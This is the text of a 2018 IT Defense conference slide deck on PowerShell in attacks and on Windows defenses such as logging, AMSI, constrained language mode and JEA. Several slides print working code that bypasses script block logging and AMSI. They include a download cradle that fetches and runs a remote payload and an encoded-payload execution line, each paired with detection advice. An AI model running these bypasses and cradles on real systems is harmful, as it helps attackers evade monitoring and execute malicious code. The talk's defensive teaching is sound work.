Hacked? Pray that the attacker used PowerShell 4IT Defense 2018
5. Attack Simulation with PowerShell
Hacked? Pray that the attacker used PowerShell IT Defense 2018 5
InitialCompromise
6. Initial Compromise
▪ Using client side attacks is a popular and fruitful method for getting a
foothold machine.There are many well known file types that can be
used to launch a PowerShell payload.
– Office Documents (Word, Excel, PowerPoint,Access, RTF etc.)
– HTA, CHM, JS
– Scriptlets (used with regsvr32)
Hacked? Pray that the attacker used PowerShell 6IT Defense 2018
7. Domain Enumeration
▪ Once we have access as a domain user, we can begin with
enumeration of domain and gather situational awareness.
▪ After gathering enough information about the target domain, we
look for privileges on other machines to escalate our privileges
locally.
Hacked? Pray that the attacker used PowerShell 7IT Defense 2018
8. Domain Privilege Escalation
▪ So, we spotted a machine where domain admin credentials are
present and we have local admin privileges.
▪ Once again, PowerShell helps us here by providing the ability to
execute Mimikatz completely in memory.
Hacked? Pray that the attacker used PowerShell 8IT Defense 2018
9. DEMO - Attack simulation with PowerShell
Hacked? Pray that the attacker used PowerShell IT Defense 2018 9
10. Popular but useless
"Security Controls"
▪ PowerShell script execution policy
▪ Blocking or removing powershell.exe
▪ Not updating PowerShell hoping that an adversary will not get an
updated "attack tool".
Hacked? Pray that the attacker used PowerShell 10IT Defense 2018
11. PowerShell ♥ the Blue Team
▪ Microsoft fights back with PowerShell v5.1
– System-wide transcription
– Enhanced logging
– AMSI
– Constrained PowerShell
– Protected Event Logging
– JEA
Reference: https://blogs.msdn.microsoft.com/powershell/2015/06/09/powershell-the-blue-
team/
Hacked? Pray that the attacker used PowerShell 11IT Defense 2018
12. PowerShell ♥ the Blue Team - System-wide
Transcription
▪ Enables transcription (console logging) for everything
(powershell.exe, PowerShell ISE, custom hosts - .NET DLL, msbuild,
installutil etc.) which uses PowerShell engine.
▪ Can be enabled using Group Policy (Administrative Templates -
> Windows Components -> Windows PowerShell -> Turn on
PowerShell Transcription). By-default transcripts are saved in
the user's "My Documents" directory.
▪ HKLM:SoftwarePoliciesMicrosoftWindowsPowerShellTra
nscription is the Registry key. Set EnableTranscriptng to 1. (See
Enable-PSTranscription in the referred blog)
Hacked? Pray that the attacker used PowerShell 12IT Defense 2018
13. PowerShell ♥ the Blue Team - System-wide
Transcription
Hacked? Pray that the attacker used PowerShell 13IT Defense 2018
14. PowerShell ♥ the Blue Team - System-wide
Transcription
▪ The transcripts are written as text files and can quickly grow in size
because the command output is also recorded. It is always
recommended to forward the transcripts to a log system to avoid
tempering and running out of disk space.
▪ Known problems -Too many logs in an enterprise level network.
Enabling transcripts on a DC breaks the Active Directory
Administration Centre GUI application.
Hacked? Pray that the attacker used PowerShell 14IT Defense 2018
15. PowerShell ♥ the Blue Team - Enhanced
Logging
Script block logging
▪ Logs contents of all the script blocks processed by the PowerShell
engine regardless of host used.
▪ Can be enabled using Group Policy (Administrative Templates -
> Windows Components -> Windows PowerShell -> Turn on
PowerShell Script Block Logging). Logs to Microsoft-
Windows-PowerShell/Operational.
▪ By-default only first execution of a script block is logged (Verbose
4104). Set "Log script block invocation start / stop
events" for start and stop of scripts in Event ID 4105
and 4106.(Multi-fold increase in number of logs)
Hacked? Pray that the attacker used PowerShell 15IT Defense 2018
16. PowerShell ♥ the Blue Team - Enhanced
Logging
Script block logging
▪ HKLM:SoftwarePoliciesMicrosoftWindowsPowerShellScr
iptBlockLogging is the Registry key. Set
EnableScriptBlockLogging to 1. (See Enable-
PSScriptBlockLogging in the referred blog)
▪ PowerShell v5 onwards logs (Warning level Event ID 4104) some
suspicious script blocks automatically based on a list of suspicious
commands. See: https://github.com/PowerShell/PowerShell/blob/v6.0.0-
alpha.18/src/System.Management.Automation/engine/runtime/CompiledScriptBlock.c
s#L1612-L1660
▪ It also records the original obfuscated code as well as decoded and
de-obfuscated code.
Hacked? Pray that the attacker used PowerShell 16IT Defense 2018
17. PowerShell ♥ the Blue Team - Enhanced
Logging
Hacked? Pray that the attacker used PowerShell 17IT Defense 2018
18. PowerShell ♥ the Blue Team - Enhanced
Logging
Module logging
▪ Available since PowerShell v3, module logging logs pipeline execution and
command execution events.
▪ Can be enabled using Group Policy (Administrative Templates ->
Windows Components -> Windows PowerShell -> Turn on Module
Logging). Use "*' to log for all modules. Logs to Microsoft-Windows-
PowerShell/Operational with Event ID 4103.
▪ HKLMSOFTWAREWow6432NodePoliciesMicrosoftWindowsPowerS
hellModuleLogging is the Registry key. Set EnableModuleLogging to
1.
▪ HKLMSOFTWAREWow6432NodePoliciesMicrosoftWindowsPowerS
hellModuleLoggingModuleNames is the Regsitry key. Create a key *
and set it to * for all modules.
Hacked? Pray that the attacker used PowerShell 18IT Defense 2018
19. PowerShell ♥ the Blue Team - Enhanced
Logging
Module logging
Hacked? Pray that the attacker used PowerShell 19IT Defense 2018
20. PowerShell ♥ the Blue Team - Enhanced
Logging
▪ Warning level script block logging checks only for a known list of
suspicious commands.
▪ Large number of logs for script block logging. Even more if
invocation of script blocks is logged.
▪ Huge number of logs when module logging is enabled.
Hacked? Pray that the attacker used PowerShell 20IT Defense 2018
21. PowerShell ♥ the Blue Team - AMSI
▪ AMSI (AntiMalware Scan Interface) provides the registered antivirus
access to contents of a script before execution.
▪ This allows detection of malicious scripts regardless of input method
(disk, encodedcommand, in-memory).
▪ Enabled by-default onWindows 10 and supported byWindows
Defender.
▪ Known problem: AMSI has no detection mechanism. It is dependent
on the signature based detection by the registered antivirus.
Hacked? Pray that the attacker used PowerShell 21IT Defense 2018
22. PowerShell ♥ the Blue Team - AMSI
Hacked? Pray that the attacker used PowerShell 22IT Defense 2018
23. PowerShell ♥ the Blue Team - Constrained
PowerShell
▪ Language mode in PowerShell is used to control access to different
elements for a PowerShell session.
▪ In the constrained language mode, allWindows cmdlets and
elements are allowed but allows only limited types. For example,
Add-Type,Win32APIs, COM objects are not allowed.
▪ Intended to work with Applocker in Allow mode or UMCI (Device
Guard User Mode Code Integrity). When Allow mode is set for scripts
in Applocker, the Constrained Language mode kicks-in by itself.
▪ Known problem: Not easy to implement enterprise-wide as it may
break many legitimate scripts.
Hacked? Pray that the attacker used PowerShell 23IT Defense 2018
24. PowerShell ♥ the Blue Team - Constrained
PowerShell
Hacked? Pray that the attacker used PowerShell 24IT Defense 2018
25. PowerShell ♥ the Blue Team - JEA
▪ JEA (Just Enough Administration) provides role based access control
for PowerShell based remote delegated administration.
▪ With JEA non-admin users can connect remotely to machines for
doing specific tasks.
▪ Focused more on securing privileged access than solving a problem
introduced with PowerShell unlike others discussed so far.
▪ JEA endpoints have PowerShell transcription and logging enabled.
Reference: https://msdn.microsoft.com/en-us/library/dn896648.aspx
Hacked? Pray that the attacker used PowerShell 25IT Defense 2018
26. DEMO - Did we left fingerprints?
Hacked? Pray that the attacker used PowerShell IT Defense 2018 26
27. Same Attack Simulation
without PowerShell
▪ Initial Compromise -VBA,VBScript and JScript payloads.
– Metasploit and ton of other tools
▪ Active Directory enumeration
– WMI,VBScript
▪ Domain Privilege Escalation -
– Mimikatz in JS using DotNetToJScript
– Packed and obfuscated mimikatz.exe
▪ From the defenses discussed, only AMSI will interfere with execution
of the scripts.
Hacked? Pray that the attacker used PowerShell 27IT Defense 2018
28. How PowerShell fairs in comparison to
other shell and scripting languages?
From: https://blogs.msdn.microsoft.com/powershell/2017/04/10/a-
comparison-of-shell-and-scripting-language-security/
Hacked? Pray that the attacker used PowerShell 28IT Defense 2018
29. No more PowerShell Red Teaming?
▪ Does all this mean that PowerShell is not good for red teaming
anymore?
▪ PowerShell still provides very useful ability of lateral movement and
script execution.At least as long as the security controls are not
deployed and managed in enterprises.
▪ Also, there is a very smart PowerShell tooling community creating
top notch tools useful for both Red and BlueTeams.
Hacked? Pray that the attacker used PowerShell 29IT Defense 2018
30. Bypassing the Defenses and Detecting the
Bypasses
▪ Bypasses for the defenses can be categorized in the following
categories:
– PowerShell downgrade to version 2
– Unloading, disabling or unsubscribing
– Obfuscation
– Trust abuse (Using trusted executables and code injection in trusted scripts)
▪ Many bypasses leave log entries which can be used to detect them.
Hacked? Pray that the attacker used PowerShell 30IT Defense 2018
31. Bypassing the defenses - PowerShell
Downgrade
▪ PowerShell version 2 lacks ALL of the detection mechanisms we
discussed.
▪ PowerShell version 2 can be called using the -Version parameter or
by using v2 reference assemblies.
▪ Version v2.0, 3.0 or 3.5 of the .NET Framework is required to use
PowerShell v2.
▪ PowerShell v2Windows features must be enabled (enabled by
default).
Hacked? Pray that the attacker used PowerShell 31IT Defense 2018
32. Detecting the Bypass- PowerShell
Downgrade
▪ The "Windows PowerShell" log can be used to detect the downgrade
bypass.The Event ID 400 (Engine Lifecycle) logs the "HostVersion" as
2.0.
▪ Device Guard or Applocker can be used to block older version of PowerShell.
http://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-
downgrade-attacks/
Hacked? Pray that the attacker used PowerShell 32IT Defense 2018
33. Bypassing the defenses - Unloading
Script Block Logging
▪ Script block logging can be bypassed for the current session without admin rights
by disabling it from the Group Policy Cache as discovered by Ryan Cobb.
▪ For efficiency, Group Policy settings are cached and used by Powershell. It is
possible to read and modify the settings!
Taken From: https://cobbr.io/ScriptBlock-Logging-Bypass.html
Hacked? Pray that the attacker used PowerShell 33
$GroupPolicyField =
[ref].Assembly.GetType('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings',
'N'+'onPublic,Static')
If ($GroupPolicyField) {
$GroupPolicyCache = $GroupPolicyField.GetValue($null)
If ($GroupPolicyCache['ScriptB'+'lockLogging']) {
$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0
$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0
}
$val = [System.Collections.Generic.Dictionary[string,System.Object]]::new()
$val.Add('EnableScriptB'+'lockLogging', 0)
$val.Add('EnableScriptB'+'lockInvocationLogging', 0)
$GroupPolicyCache['HKEY_LOCAL_MACHINESoftwarePoliciesMicrosoftWindowsPowerShellScriptB'+'lockLogging
'] = $val
}
iex (New-Object Net.WebClient).downloadstring("https://myserver/mypayload.ps1")
IT Defense 2018
34. Bypassing the defenses - Unloading
Warning Level Script Block Logging
▪ Recall that theWarning level script block logging (which is enabled by default) uses
a list of known bad words.
▪ Turns out the logging can be bypassed for the current session without admin rights
by setting the list (signatures field in the ScriptBlock class ) to null.Once again,
discovered by Ryan Cobb.
Taken From: https://cobbr.io/ScriptBlock-Warning-Event-Logging-Bypass.html
Hacked? Pray that the attacker used PowerShell 34
# The bypass
[ScriptBlock]."GetFiel`d"('signatures','N'+'onPublic,Static').SetValue($null,(New
-Object Collections.Generic.HashSet[string]))
# To use a base64 encoded payload script with the bypass
[ScriptBlock]."GetFiel`d"('signatures','N'+'onPublic,Static').SetValue($null,(New
-Object
Collections.Generic.HashSet[string]));[Text.Encoding]::Unicode.GetString([Convert
]::FromBase64String('IgA8AE0AeQAgAHMAdQBzAHAAaQBjAGkAbwB1AHMAIABOAG8AbgBQAHUAYgBs
AGkAYwAgAHAAYQB5AGwAbwBhAGQAPgAiAA=='))|iex
IT Defense 2018
35. Detecting the bypass- Unloading
Script Block Logging
▪ Both the bypasses are logged unless obfuscated.
▪ Script block logging bypass evades detection if used from a
download cradle.
Hacked? Pray that the attacker used PowerShell 35IT Defense 2018
36. Bypassing the defenses - Disabling AMSI
▪ AMSI can be bypassed for the current session without admin rights by setting the
amsiInitFailed of System.Management.Automation.AmsiUtils to true as tweeted
by Matt Graber
https://twitter.com/mattifestation/status/735261176745988096
Hacked? Pray that the attacker used PowerShell 36
# Use s_amsiInitFailed for PowerShell v6.
#Bypass one - marked as malicious by some AntiVirus. Use with obfuscation.
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiIn
itFailed','NonPublic,Static').SetValue($null,$true)
#Bypass two - not detected by auto logging
[Delegate]::CreateDelegate(("Func``3[String,
$(([String].Assembly.GetType('System.Reflection.Bindin'+'gFlags')).FullName),
System.Reflection.FieldInfo]" -as [String].Assembly.GetType('System.T'+'ype')),
[Object]([Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')),('GetF
ie'+'ld')).Invoke('amsiInitFailed',(('Non'+'Public,Static') -as
[String].Assembly.GetType('System.Reflection.Bindin'+'gFlags'))).SetValue($null,$
True)
IT Defense 2018
37. Detecting the bypasses- AMSI
▪ Warning level script block auto logging detects the first bypass.
Hacked? Pray that the attacker used PowerShell 37IT Defense 2018
38. Bypassing the Defenses - Obfuscation
▪ Obfuscation defeats script block logging, warning level auto logging
and AMSI when done right.
▪ As a very simple example, we have already seen how GetField
becomes GetFiel`d to bypass warning level auto logging.
▪ Invoke-Obfuscation and Invoke-CradleCrafter from Daniel
(https://github.com/danielbohannon) are very useful for
implementing obfuscation.
Hacked? Pray that the attacker used PowerShell 38IT Defense 2018
39. Detecting the bypasses- Obfuscation
▪ Obfuscated scripts can be spotted by comparing common
characteristics like variable names, function names, character
frequency, distribution of language operators, entropy etc.
▪ Revoke-Obfusction (https://github.com/danielbohannon/Revoke-
Obfuscation) is one such tool for identifying obfuscated scripts from
event logs.
▪ Bonus:To avoid detection of obfuscation we can use minimal
obfuscation by identifying the exact signature which gets detected
and obfuscating only that part of the script. See:
https://cobbr.io/PSAmsi-Minimizing-Obfuscation-To-Maximize-
Stealth.html
Hacked? Pray that the attacker used PowerShell 39IT Defense 2018
40. Bypassing the defenses - PowerShell
Upgrade (!!?)
▪ PowerShell v6.0.0 (pwsh.exe) has only two of the discussed security
features:Warning level script block logging (not automatic) and AMSI
(the bypasses still works).
▪ This is probably because it is notWindows PowerShell but
PowerShell Core.
▪ The warning level script block logging needs to be setup by running a
PowerShell script RegisterMaifest.ps1 which registers the
PowerShellCore event provider.
http://www.labofapenetrationtester.com/2018/01/powershell6.html
Hacked? Pray that the attacker used PowerShell 40IT Defense 2018
41. Bypassing the defenses - PowerShell
Upgrade (!!?)
Hacked? Pray that the attacker used PowerShell 41IT Defense 2018
42. Conclusion
▪ The security controls, as we saw, can be bypassed but they truly
increase cost to an adversary. And this makes the security controls,
good enough to be implemented.
▪ All the security controls are built-in, free and do not need specizlized
knowledge or set up time.
▪ Not over for red teamers - PowerShell is a tool for true Purple
Teaming!
Hacked? Pray that the attacker used PowerShell 42IT Defense 2018
43. Thank You
▪ Please leave feedback.
▪ Follow me @nikhil_mitt
▪ For questions, training, assessments -
nikhil.uitrgpv@gmail.com
nikhil@pentesteracademy.com
Hacked? Pray that the attacker used PowerShell IT Defense 2018 43